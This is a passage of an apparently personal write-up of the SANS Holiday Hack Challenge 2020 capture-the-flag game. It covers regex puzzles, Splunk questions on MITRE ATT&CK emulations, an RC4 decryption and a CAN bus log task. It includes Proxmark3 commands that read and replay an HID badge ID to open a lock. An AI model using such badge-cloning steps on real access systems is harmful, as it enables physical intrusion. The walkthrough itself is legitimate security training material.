&lt;ul class="simple"&gt;
&lt;li&gt;12:24:53&lt;/li&gt;
&lt;li&gt;1:05:24&lt;/li&gt;
&lt;li&gt;23:02:43&lt;/li&gt;
&lt;li&gt;08:04:10&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, the following would be invalid:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;25:30:86&lt;/li&gt;
&lt;li&gt;A1:E4:B5&lt;/li&gt;
&lt;li&gt;B2:13:4A&lt;/li&gt;
&lt;li&gt;32:24:53&lt;/li&gt;
&lt;li&gt;08:74:53&lt;/li&gt;
&lt;li&gt;12:5:24&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ok, let's start with the hour value. It's a number between 0 and 23, and it can
be a single digit or two digits:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;0?[0-9]&lt;/code&gt; will take care of values between 0 and 9, with an optional
(&lt;code&gt;?&lt;/code&gt;) padding 0.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1[0-9]&lt;/code&gt; will take care of hours between 10 and 19.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2[0-3]&lt;/code&gt; will take care of hours between 20 and 23.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's put a pipe (&lt;code&gt;|&lt;/code&gt;) between these different values, and we get our
regex for the hours: &lt;code&gt;(0?[0-9]|1[0-9]|2[0-3])&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Minutes and seconds are simple: they're a number between 0 and 59, and they're
always on two digits: &lt;code&gt;[0-5][0-9]&lt;/code&gt; works for both of them.&lt;/p&gt;
&lt;p&gt;Now, we can take our three regex, separate them with our delimiter &lt;code&gt;:&lt;/code&gt;,
and surround everything with a &lt;code&gt;^&lt;/code&gt; at the start and a &lt;code&gt;$&lt;/code&gt; at the
end, so that it matches &lt;em&gt;only&lt;/em&gt; our desired time formats:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;^((0?[0-9]|1[0-9]|2[0-3]):[0-5][0-9]:[0-5][0-9])$&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Matches MAC address format only while ignoring case&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A MAC address is represented by six hex-encoded bytes, separated by &lt;code&gt;:&lt;/code&gt;,
e.g &lt;code&gt;11:22:33:44:55:66&lt;/code&gt;. One byte can be represented by
&lt;code&gt;[0-9a-fA-F]{2}&lt;/code&gt; (it always has a length of two characters).&lt;/p&gt;
&lt;p&gt;Now, we could copy and paste this regex six times, and separate it with
&lt;code&gt;:&lt;/code&gt;. However, we can use a counter with &lt;code&gt;{.}&lt;/code&gt; to avoid duplicate.&lt;/p&gt;
&lt;p&gt;Let's take the following regex: &lt;code&gt;([0-9a-fA-F]{2}:){5}&lt;/code&gt;. With our example
MAC address, this would match &lt;code&gt;11:22:33:44:55:&lt;/code&gt;. We can now copy/paste
our byte regex (only one time!) to match the entire MAC address (and add
&lt;code&gt;^&lt;/code&gt; and &lt;code&gt;$&lt;/code&gt; to &lt;em&gt;only&lt;/em&gt; match MAC addresses):&lt;/p&gt;
&lt;p&gt;&lt;code&gt;^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic" start="8"&gt;
&lt;li&gt;&lt;p class="first"&gt;Matches multiple day, month, and year date formats only&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Create a regular expression that only matches one of the three following
day, month, and four digit year formats:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;10/01/1978&lt;/li&gt;
&lt;li&gt;01.10.1987&lt;/li&gt;
&lt;li&gt;14-12-1991&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, the following values would be invalid formats:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;05/25/89&lt;/li&gt;
&lt;li&gt;12-32-1989&lt;/li&gt;
&lt;li&gt;01.1.1989&lt;/li&gt;
&lt;li&gt;1/1/1&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let's start with the days: they are a number between 1 and 31, on two digits:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;0[1-9]&lt;/code&gt; takes care of days 1 through 9.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[12][0-9]&lt;/code&gt; takes care of days 10 to 29.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3[01]&lt;/code&gt; takes care of days 30 and 31.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Separated by pipes, this gives us the following regex for days:
&lt;code&gt;(0[1-9]|[12][0-9]|3[01])&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, for months: they are a number between 1 and 12, on two digits:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;0[1-9]&lt;/code&gt; takes care of months 1 through 9.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1[0-2]&lt;/code&gt; takes care of months 10 through 12.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Separated by pipes, this gives us the following regex for months:
&lt;code&gt;(0[1-9]|1[0-2])&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;And finally, the years: they're on a four digit-format, and given the examples,
I've decided to restrict myself to 1900s: &lt;code&gt;19[0-9]{2}&lt;/code&gt; should do the
trick.&lt;/p&gt;
&lt;p&gt;Now, let's separate our different regex with a separator class, something like
&lt;code&gt;[./-]&lt;/code&gt;, given the examples, and surround everything with &lt;code&gt;^&lt;/code&gt; and
&lt;code&gt;$&lt;/code&gt; to &lt;em&gt;only&lt;/em&gt; match our wanted date formats:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;^(0[1-9]|[12][0-9]|3[01])[./-](0[1-9]|1[0-2])[./-]19[0-9]{2}$&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;And the Sort-o-matic is fixed:&lt;/p&gt;
&lt;img alt="sortomatic_fixed.png" class="align-center" src="/images/sans-christmas-challenge-2020/sortomatic_fixed.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="open-hid-lock"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id21"&gt;Open HID Lock&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Now that we helped Bushy Evergreen, he gives us a Proxmark3. This is a handy
tool that can be used to interact with HID badges. Maybe we can capture the
ID of an HID badge, and replay it against the lock in the workshop? Hmm, but
which badge should we capture?&lt;/p&gt;
&lt;p&gt;The objective tells us that we can go ask Fitzy Shortstack for clues. First,
we must help him light up the lights in the Christmas tree:&lt;/p&gt;
&lt;img alt="fitzyshortstack.png" class="align-center" src="/images/sans-christmas-challenge-2020/fitzyshortstack.png" /&gt;
&lt;p&gt;&lt;em&gt;Fitzy Shortstack says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Put it in the cloud,&amp;quot; they said...&lt;/p&gt;
&lt;p&gt;&amp;quot;It'll be great,&amp;quot; they said...&lt;/p&gt;
&lt;p&gt;All the lights on the Christmas trees throughout the castle are controlled
through a remote server.&lt;/p&gt;
&lt;p&gt;We can shuffle the colors of the lights by connecting via dial-up, but our
only modem is broken!&lt;/p&gt;
&lt;p&gt;Fortunately, I speak dial-up. However, I can't quite remember the handshake
sequence.&lt;/p&gt;
&lt;p&gt;Maybe you can help me out? The phone number is 756-8347; you can use this
blue phone.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's what we get if we click on the phone:&lt;/p&gt;
&lt;img alt="fitzy_shortstack_blue_phone.png" class="align-center" src="/images/sans-christmas-challenge-2020/fitzy_shortstack_blue_phone.png" /&gt;
&lt;p&gt;He gives us the link to the audio of a &lt;a class="reference external" href="https://upload.wikimedia.org/wikipedia/commons/3/33/Dial_up_modem_noises.ogg"&gt;dial-up connection&lt;/a&gt;.
However, it's not suuuuper helpful, so I mainly found the solution via trial
and error. Turns out the correct sequence is:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;baa DEE brrr&lt;/li&gt;
&lt;li&gt;aaah&lt;/li&gt;
&lt;li&gt;wewewwrwrrwrr&lt;/li&gt;
&lt;li&gt;beDURRdunditty&lt;/li&gt;
&lt;li&gt;SCHHRRHHRTHRTR&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After that, Fitzy is really grateful we helped him:&lt;/p&gt;
&lt;img alt="fitzyshortstack.png" class="align-center" src="/images/sans-christmas-challenge-2020/fitzyshortstack.png" /&gt;
&lt;p&gt;&lt;em&gt;Fitzy Shortstack says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;탢ݵרOُ񆨶$Ԩ؉楌Բ ahem! We did it! Thank you!!&lt;/p&gt;
&lt;p&gt;Anytime you feel like changing the color scheme up, just pick up the phone!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;You know, Santa really seems to trust Shinny Upatree...&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hmm, so Shinny Upatree seems to have the badge opening the HID lock in the
workshop?&lt;/p&gt;
&lt;p&gt;Turns out, if we take out our Proxmark next to an elf, we can see that they
each have a badge. Let's read Shinny's badge:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[magicdust] pm3 --&amp;gt; lf hid read&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="gp"&gt;#&lt;/span&gt;db# TAG ID: 2006e22f13 &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="m"&gt;6025&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; - Format Len: &lt;span class="m"&gt;26&lt;/span&gt; bit - FC: &lt;span class="m"&gt;113&lt;/span&gt; - Card: &lt;span class="m"&gt;6025&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we can replay this ID next to the lock with the following command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[magicdust] pm3 --&amp;gt; lf hid sim -r 2006e22f13&lt;/span&gt;
&lt;span class="go"&gt;[=] Simulating HID tag using raw 2006e22f13&lt;/span&gt;
&lt;span class="go"&gt;[=] Stopping simulation after 10 seconds.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="workshop_hid_unlock.gif" class="align-center" src="/images/sans-christmas-challenge-2020/workshop_hid_unlock.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-6-splunk-challenge"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id22"&gt;Objective 6: Splunk Challenge&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Once the door in the workshop is unlocked, we arrive into a dark room. We can
see two ray of lights at the bottom. We advance and...&lt;/p&gt;
&lt;img alt="i_am_santa.gif" class="align-center" src="/images/sans-christmas-challenge-2020/i_am_santa.gif" /&gt;
&lt;p&gt;Holy sh*t, we're Santa now! Jack Frost's gift portrait seems to allow us to
take control of Santa. We can run around the castle and interact with computers
that were unavailable to us before! For example, we can go into the Great Room,
and interact with the &lt;a class="reference external" href="https://splunk.kringlecastle.com/en-US/account/insecurelogin?username=santa&amp;amp;password=2f3a4fccca6406e35bcf33e92dd93135"&gt;Splunk Server&lt;/a&gt;.&lt;/p&gt;
&lt;div class="section" id="answering-the-training-questions"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id23"&gt;Answering the training questions&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="first-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id24"&gt;First question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;How many distinct MITRE ATT&amp;amp;CK techniques did Alice emulate?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We can get the correct request from our chat with Alice:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I stored every simulation in its own index so you can just use a Splunk search like&lt;/p&gt;
&lt;blockquote&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;tstats count where index=* by index&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;for starters!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, let's head over the &lt;a class="reference external" href="https://splunk.kringlecastle.com/fr-FR/app/SA-kringleconsoc/search"&gt;Splunk search interface&lt;/a&gt;
and input this request:&lt;/p&gt;
&lt;img alt="splunk_first_search.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_first_search.png" /&gt;
&lt;p&gt;We can now count the different attacks:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;t1033&lt;/li&gt;
&lt;li&gt;t1057&lt;/li&gt;
&lt;li&gt;t1059.003&lt;/li&gt;
&lt;li&gt;t1059.005&lt;/li&gt;
&lt;li&gt;t1071.001&lt;/li&gt;
&lt;li&gt;t1082&lt;/li&gt;
&lt;li&gt;t1105&lt;/li&gt;
&lt;li&gt;t1106&lt;/li&gt;
&lt;li&gt;t1123&lt;/li&gt;
&lt;li&gt;t1204.002&lt;/li&gt;
&lt;li&gt;t1547.001&lt;/li&gt;
&lt;li&gt;t1548.002&lt;/li&gt;
&lt;li&gt;t1559.002&lt;/li&gt;
&lt;li&gt;t1566.001&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So thirteen in total.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="second-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id25"&gt;Second question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;What are the names of the two indexes that contain the results of emulating
Enterprise ATT&amp;amp;CK technique 1059.003?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The indexes are &lt;code&gt;t1059.003-main&lt;/code&gt; and &lt;code&gt;t1059.003-win&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="third-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id26"&gt;Third question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;One technique that Santa had us simulate deals with 'system information
discovery'. What is the full name of the registry key that is queried to
determine the MachineGuid?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we search the MITRE ATT&amp;amp;CK techniques, we can see that &amp;quot;System Information
Discovery&amp;quot; is attack &lt;a class="reference external" href="https://attack.mitre.org/techniques/T1082/"&gt;T1082&lt;/a&gt;.
Let's filter on this index and on string &lt;code&gt;MachineGuid&lt;/code&gt; in our search:&lt;/p&gt;
&lt;img alt="splunk_machineguid.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_machineguid.png" /&gt;
&lt;p&gt;The registry key is &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fourth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id27"&gt;Fourth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;According to events recorded by the Splunk Attack Range, when was the first
OSTAP related atomic test executed?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Oooooooh boy, did I lose time with this one. The clue given by Alice is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I suppose the SOC elves might overthink this one. Splunk Attack Range keeps track of the simulations that are run in&lt;/p&gt;
&lt;blockquote&gt;
index=attack&lt;/blockquote&gt;
&lt;p&gt;You can then search that index for specific keywords...&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I &lt;em&gt;thought&lt;/em&gt; that the &lt;code&gt;attack&lt;/code&gt; word in the clue was just a placeholder for
the attack ID. So I search for &lt;code&gt;atomic test ostap&lt;/code&gt; and found &lt;a class="reference external" href="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/Indexes/Indexes-Markdown/index.md"&gt;this
file&lt;/a&gt;
in Atomic Red Team Github's page. I then search for &amp;quot;OSTap&amp;quot; and found that the
attacks related to this technique are T1105 and T1204.002. So I searched for
these indexes in Splunk, with request query &lt;code&gt;index=&amp;quot;t1105*&amp;quot; OR index=&amp;quot;t1204.002*&amp;quot; &amp;quot;ostap&amp;quot;&lt;/code&gt;.
I only got three events. I tried to submit the timestamps for these events in
every format I could think of, but to no avail.&lt;/p&gt;
&lt;p&gt;A kind soul in the chat helped me realize that the name of the index &lt;em&gt;was&lt;/em&gt;
&lt;code&gt;attack&lt;/code&gt;. It was &lt;em&gt;not&lt;/em&gt; a placeholder. It &lt;em&gt;was&lt;/em&gt; the index I was supposed
to search into all along. Anyway...&lt;/p&gt;
&lt;p&gt;I used the search filter &lt;code&gt;index=attack ostap | sort _time&lt;/code&gt;, to sort the
events from earliest to latest, and submitted the timestamp of the first event,
&lt;code&gt;2020-11-30T17:44:15Z&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fifth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id28"&gt;Fifth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;One Atomic Red Team test executed by the Attack Range makes use of an open
source package authored by frgnca on GitHub. According to Sysmon (Event Code
1) events in Splunk, what was the ProcessId associated with the first use of
this component?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We're kindly given the name of an open source contributor. Let's check their
&lt;a class="reference external" href="https://github.com/frgnca?tab=repositories"&gt;Github repositories&lt;/a&gt;. Out of
the eight repositories, the most likely to be included in an attack (or attack
simulation framework) is the PowerShell cmdlets used to control audio devices,
&lt;a class="reference external" href="https://github.com/frgnca/AudioDeviceCmdlets"&gt;AudioDeviceCmdlets&lt;/a&gt;. Indeed,
the other repositories seem to be mainly personal notes or config files.&lt;/p&gt;
&lt;p&gt;Let's &lt;a class="reference external" href="https://github.com/redcanaryco/atomic-red-team/search?q=AudioDeviceCmdlets"&gt;search for this package&lt;/a&gt;
in Atomic Red Team. We can see that we get one associated test, T1123. We can
also see that the test use a different URL for the package, namely
&lt;a class="reference external" href="https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet"&gt;https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet&lt;/a&gt;. However, by
going to this URL, we are redirected to our original package. But it may mean
that Atomic Red Team uses a different name; for example
&lt;code&gt;WIndowsAudioDevice&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;All these information lead us to build a search filter of &lt;code&gt;index=t1123* EventCode=1 &amp;quot;WindowsAudioDevice&amp;quot;&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="splunk_fifth_question.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_fifth_question.png" /&gt;
&lt;p&gt;Only two events! They seem to have occured at the same time, so let's take the
one with the lowest &lt;code&gt;id&lt;/code&gt; field, which must have occured first. We can
see that the process id is &lt;code&gt;3648&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="sixth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id29"&gt;Sixth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;Alice ran a simulation of an attacker abusing Windows registry run keys.
This technique leveraged a multi-line batch file that was also used by a few
other techniques. What is the final command of this multi-line batch file
used as part of this simulation?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I actually solved this one without Splunk. There aren't many MITRE ATT&amp;amp;CK
techniques that abuse Windows registry run keys. By searching for &lt;code&gt;mitre
att&amp;amp;ck windows registry run&lt;/code&gt;, we can find technique &lt;a class="reference external" href="https://attack.mitre.org/techniques/T1547/001/"&gt;T1547.001&lt;/a&gt;,
which uses Windows registry run keys to autostart malicious executable files
at startup. If we look at this technique in &lt;a class="reference external" href="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"&gt;Atomic Red Team Github's page&lt;/a&gt;,
we see that the only &lt;code&gt;.bat&lt;/code&gt; file used with a registry key is the one
used in the &lt;a class="reference external" href="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md#atomic-test-3---powershell-registry-runonce"&gt;Atomic Test #3&lt;/a&gt;.
It seems to be hosted at &lt;a class="reference external" href="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat"&gt;https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat&lt;/a&gt;,
and the last line is &lt;code&gt;quser&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="seventh-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id30"&gt;Seventh question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;According to x509 certificate events captured by Zeek (formerly Bro), what
is the serial number of the TLS certificate assigned to the Windows domain
controller in the attack range?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In the Splunk chat, Alice tells us to use the search filter &lt;code&gt;index=*
sourcetype=bro*&lt;/code&gt;. Let's search for this:&lt;/p&gt;
&lt;img alt="splunk_zseek_cert.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_zeek_cert.png" /&gt;
&lt;p&gt;Only twelve different certificate serials. Now, we could try to submit each
one, but where's the fun in that! We're asked for the serial of the domain
controller, so let's take a look at the certificate subjects:&lt;/p&gt;
&lt;img alt="splunk_zeek_cert_subjects.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_zeek_cert_subjects.png" /&gt;
&lt;p&gt;Now the first result, with a name of &lt;code&gt;win-dc-748.attackrange.local&lt;/code&gt; seems
to be a good candidate. Let's click on it:&lt;/p&gt;
&lt;img alt="splunk_zeek_cert_dc.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_zeek_cert_dc.png" /&gt;
&lt;p&gt;We only have one serial left, &lt;code&gt;55FCEEBB21270D9249E86F4B9DC7AA60&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="answering-the-challenge-question"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id31"&gt;Answering the challenge question&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;And now, on to the big challenge question: What is the name of the adversary
group that Santa feared would attack KringleCon?&lt;/p&gt;
&lt;p&gt;We get this information from Alice in the chat:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This last one is encrypted using your favorite phrase! The base64 encoded
ciphertext is:&lt;/p&gt;
&lt;blockquote&gt;
7FXjP1lyfKbyDK/MChyf36h7&lt;/blockquote&gt;
&lt;p&gt;It's encrypted with an old algorithm that uses a key. We don't care about
RFC 7465 up here! I leave it to the elves to determine which one!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a class="reference external" href="https://tools.ietf.org/html/rfc7465"&gt;RFC 7465&lt;/a&gt; is the RFC prohibiting RC4
cipher suites. If Alice doesn't care about it, we can suppose that's what she
used.&lt;/p&gt;
&lt;p&gt;For the encryption key, she apparently used Santa's favorite phrase. What could
it be?&lt;/p&gt;
&lt;blockquote&gt;
I can't believe the Splunk folks put it in their talk!&lt;/blockquote&gt;
&lt;p&gt;If we head over to &lt;a class="reference external" href="https://www.youtube.com/watch?v=RxVgEFt08kU"&gt;Splunk's Dave Herald's talk on Adversary Emulation and
Automation&lt;/a&gt;, we're told that
it's very important to &lt;code&gt;Stay Frosty&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="splunk_talk_stay_frosty.png" class="align-center" src="/images/sans-christmas-challenge-2020/splunk_talk_stay_frosty.png" /&gt;
&lt;p&gt;So this must be the encryption key. Let's whip up a little Python console to
decrypt the string:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;Crypto.Cipher&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ARC4&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;base64&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;encrypted_text&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;7FXjP1lyfKbyDK/MChyf36h7&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Stay Frosty&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ARC4&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encrypted_text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;b&amp;#39;The Lollipop Guild&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Santa was afraid that &lt;code&gt;The Lollipop Guild&lt;/code&gt; would try and attack
KringleCon this year.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-7"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id32"&gt;Objective 7:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="wunorse-openslae-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id33"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Welcome to the CAN bus terminal challenge!&lt;/span&gt;
&lt;span class="go"&gt;In your home folder, there&amp;#39;s a CAN bus capture from Santa&amp;#39;s sleigh. Some of&lt;/span&gt;
&lt;span class="go"&gt;the data has been cleaned up, so don&amp;#39;t worry - it isn&amp;#39;t too noisy. What you&lt;/span&gt;
&lt;span class="go"&gt;will see is a record of the engine idling up and down. Also in the data are&lt;/span&gt;
&lt;span class="go"&gt;a LOCK signal, an UNLOCK signal, and one more LOCK. Can you find the UNLOCK?&lt;/span&gt;

&lt;span class="go"&gt;We&amp;#39;d like to encode another key mechanism.&lt;/span&gt;
&lt;span class="go"&gt;Find the decimal portion of the timestamp of the UNLOCK code in candump.log&lt;/span&gt;
&lt;span class="go"&gt;and submit it to ./runtoanswer!  (e.g., if the timestamp is 123456.112233,&lt;/span&gt;
&lt;span class="go"&gt;please submit 112233)&lt;/span&gt;

&lt;span class="gp"&gt;elf@cfa26cf03772:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I don't know anything about CAN buses, so I headed over &lt;a class="reference external" href="https://www.youtube.com/watch?v=96u-uHRBI0I"&gt;Chris Elgee's
KringleCon talk&lt;/a&gt; on the
subject.&lt;/p&gt;
&lt;p&gt;We can learn that CAN messages have a CAN ID, and data:&lt;/p&gt;
&lt;img alt="can_bus_message_format.png" class="align-center" src="/images/sans-christmas-challenge-2020/can_bus_message_format.png" /&gt;
&lt;p&gt;Let's take a look at the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/candump.log"&gt;candump.log file&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; head candump.log
&lt;span class="go"&gt;(1608926660.800530) vcan0 244#0000000116&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.812774) vcan0 244#00000001D3&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.826327) vcan0 244#00000001A6&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.839338) vcan0 244#00000001A3&lt;/span&gt;
&lt;span class="go"&gt;(1608926660.852786) vcan0 244#00000001B4&lt;/span&gt;
